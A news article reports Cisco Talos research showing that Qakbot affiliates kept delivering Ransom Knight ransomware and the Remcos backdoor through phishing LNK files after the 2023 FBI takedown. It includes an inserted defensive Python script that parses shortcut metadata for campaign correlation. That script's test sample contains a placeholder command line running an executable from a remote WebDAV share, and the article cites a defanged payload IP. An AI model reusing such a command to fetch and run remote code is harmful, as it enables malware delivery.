Qakbot threat still lingering despite FBI takedown
Qakbot-affiliated threat actors are still active despite the high-profile takedown


Security researchers have warned that Qakbot-affiliated hackers remain a pervasive threat despite a high-profile takedown that saw the group’s infrastructure disrupted.
In August 2023, an operation led by the FBI and international law enforcement partners seized infrastructure assets used by the botnet. “Operation Duck Hunt” severely disrupted Qakbot operations, and resulted in the recovery of thousands of devices infected with malware.
The takedown was touted at the time as one of the biggest in recent history.
However, researchers at Cisco Talos revealed that the threat actors behind Qakbot are still active and have been waging a ransomware campaign that began “just before the takedown”.
Observations from Cisco Talos revealed that a variant of Cyclops/Ransom Knight ransomware, as well as the Remcos backdoor malware, is being used by affiliated threat actors. This suggests the group’s activities weren’t fully shut down by the FBI’s actions and could still pose a significant threat.
"As this new operation has been ongoing since the beginning of August 2023 and has not stopped after the takedown, we believe the FBI operation didn’t affect Qakbot’s phishing email delivery infrastructure but only its command and control servers,” researchers said.
Cisco Talos said that, since August, it has tracked activity by correlating metadata from LNK files used in the new campaign with that used in previous Qakbot campaigns.
The technique follows previous instances of using LNK file metadata to identify and track threat actors, Cisco Talos said. A machine used in an earlier campaign, dubbed ‘AA’, contained a drive serial number, 0x2848e8a8, that was later used in a botnet named ‘BB’.
“Talos identified new LNK files in August 2023 that were created on the same machine referenced above, but observed that the payload of the files pointed to a network share in the command line that served a variant of Ransom Knight ransomware,” researchers explained.
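The correlation described above rests on two pieces of LNK (Windows shortcut) metadata: the drive serial number embedded in the file’s LinkInfo/VolumeID structure, and the command line arguments, which in this campaign pointed at a network share. The following Python script is an added example, not Cisco Talos tooling: it decodes just those fields from a shortcut following the MS-SHLLINK layout, compares the serial against a watch-list that uses the 0x2848e8a8 value quoted in the article, and flags command lines that reference a UNC share. The helper that builds the sample shortcut, the `EXAMPLE-SHARE` path and the `invoice.exe` name are constructed for the demonstration.

```python
"""Pull volume metadata and command-line arguments out of Windows .lnk files
for campaign correlation (example code added here, not Cisco Talos tooling).
Layout follows MS-SHLLINK: ShellLinkHeader -> [LinkTargetIDList] -> [LinkInfo]
-> StringData. Only the fields needed for correlation are decoded."""
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # 00021401-0000-0000-C000-000000000046
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x04, 0x08, 0x10, 0x20
IS_UNICODE = 0x80
VOLUME_ID_AND_LOCAL_BASE_PATH = 0x01  # LinkInfoFlags bit

# Drive serial number quoted in the article as shared between the 'AA' and 'BB' campaigns.
KNOWN_SERIALS = {0x2848E8A8: "Qakbot-linked build machine ('AA'/'BB' campaigns)"}


def parse_lnk(data: bytes) -> dict:
    """Return drive serial number, drive type and StringData fields of a shortcut."""
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a ShellLink (.lnk) file")
    pos = 0x4C
    meta = {"drive_serial": None, "drive_type": None}
    if flags & HAS_LINK_TARGET_ID_LIST:            # skip the ItemID list, not needed here
        (id_list_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + id_list_size
    if flags & HAS_LINK_INFO:
        base = pos                                   # LinkInfo offsets are relative to its start
        link_info_size, _hdr_size, info_flags, vol_off = struct.unpack_from("<IIII", data, base)
        if info_flags & VOLUME_ID_AND_LOCAL_BASE_PATH:
            _vol_size, drive_type, serial = struct.unpack_from("<III", data, base + vol_off)
            meta["drive_type"], meta["drive_serial"] = drive_type, serial
        pos = base + link_info_size
    # StringData: CountCharacters (uint16) + characters, no terminator, in this fixed order.
    for flag, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments")):
        if not flags & flag:
            continue
        (count,) = struct.unpack_from("<H", data, pos)
        pos += 2
        if flags & IS_UNICODE:
            meta[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            meta[key] = data[pos:pos + count].decode("cp1252")
            pos += count
    return meta


def correlate(data: bytes) -> dict:
    """Parse a shortcut and flag the two traits the article describes: a drive serial
    seen in earlier campaigns and a command line that points at a UNC network share."""
    meta = parse_lnk(data)
    meta["known_campaign"] = KNOWN_SERIALS.get(meta["drive_serial"])
    args = meta.get("arguments") or ""
    meta["points_to_network_share"] = "\\\\" in args
    return meta


def build_sample_lnk(serial: int, arguments: str) -> bytes:
    """Constructed minimal .lnk for testing: header + LinkInfo(VolumeID, LocalBasePath) + ARGUMENTS."""
    flags = HAS_LINK_INFO | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, flags).ljust(0x4C, b"\x00")
    label = b"\x00"                                   # empty, NUL-terminated volume label
    volume_id = struct.pack("<IIII", 16 + len(label), 3, serial, 16) + label  # DriveType 3 = fixed disk
    local_base, suffix = b"C:\\\x00", b"\x00"
    hdr = 0x1C                                        # LinkInfoHeaderSize without the Unicode offsets
    vol_off = hdr
    base_off = vol_off + len(volume_id)
    suffix_off = base_off + len(local_base)
    size = suffix_off + len(suffix)
    link_info = struct.pack("<IIIIIII", size, hdr, VOLUME_ID_AND_LOCAL_BASE_PATH,
                            vol_off, base_off, 0, suffix_off) + volume_id + local_base + suffix
    args = struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")
    return header + link_info + args


if __name__ == "__main__":
    # Constructed sample: the article's serial number plus a placeholder UNC share in the command line.
    sample = build_sample_lnk(0x2848E8A8, "/c \\\\EXAMPLE-SHARE\\dav\\invoice.exe")
    print(correlate(sample))
```

Run against real shortcuts, `parse_lnk` would take the file bytes directly; the watch-list is the piece an analyst grows over time, since a serial number by itself only says that two shortcuts were authored on the same volume and is most useful alongside the other traits (file naming, archive packaging, delivery themes) the article lists.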
Analysis of the LNK file names used in the recent campaign points to “themes or urgent financial matters”, which Talos said suggests they are being distributed via phishing emails.
This, the researchers added, is consistent with previous Qakbot campaigns and is a traditional hallmark of the botnet.
“Some of the filenames are written in Italian, which suggests the threat actors may be targeting users in that region,” they said.
Cyclops ransomware as a service
Further analysis showed that the LNK files used in the current campaign have been distributed within Zip archives, researchers said. These archives also contain a file with the XLL extension, which is used for Excel add-ins.
Researchers said the XLL files are the Remcos backdoor, which is typically executed alongside Ransom Knight to gain access to infected machines.
“The LNK file, on the other hand, downloads an executable file from remote IP 89[.]23[.]96[.]203…via WebDAV, which is the actual Ransom Knight payload,” Talos said.
This ransomware family was found to be an “updated version of the Cyclops ransomware as a service…rewritten from scratch”.
Never really gone
The warning from Cisco Talos once again raises questions over the long-term effectiveness of law enforcement ‘takedowns’ such as this.
This was a key talking point in the immediate aftermath of the August operation and follows several instances of threat actors returning after disruptive incidents.
A previous operation that took down Trickbot in 2020 appeared to have been successful initially. Within the space of a year, however, the botnet had returned.
This same scenario also occurred in the aftermath of the Emotet takedown led by Europol in 2021. Emotet re-established itself in the months following that operation and continued to pose a major threat to organizations globally.

Ross Kelly is ITPro's News & Analysis Editor, responsible for leading the brand's news output and in-depth reporting on the latest stories from across the business technology landscape. Ross was previously a Staff Writer, during which time he developed a keen interest in cyber security, business leadership, and emerging technologies.
He graduated from Edinburgh Napier University in 2016 with a BA (Hons) in Journalism, and joined ITPro in 2022 after four years working in technology conference research.
For news pitches, you can contact Ross at ross.kelly@futurenet.com, or on Twitter and LinkedIn.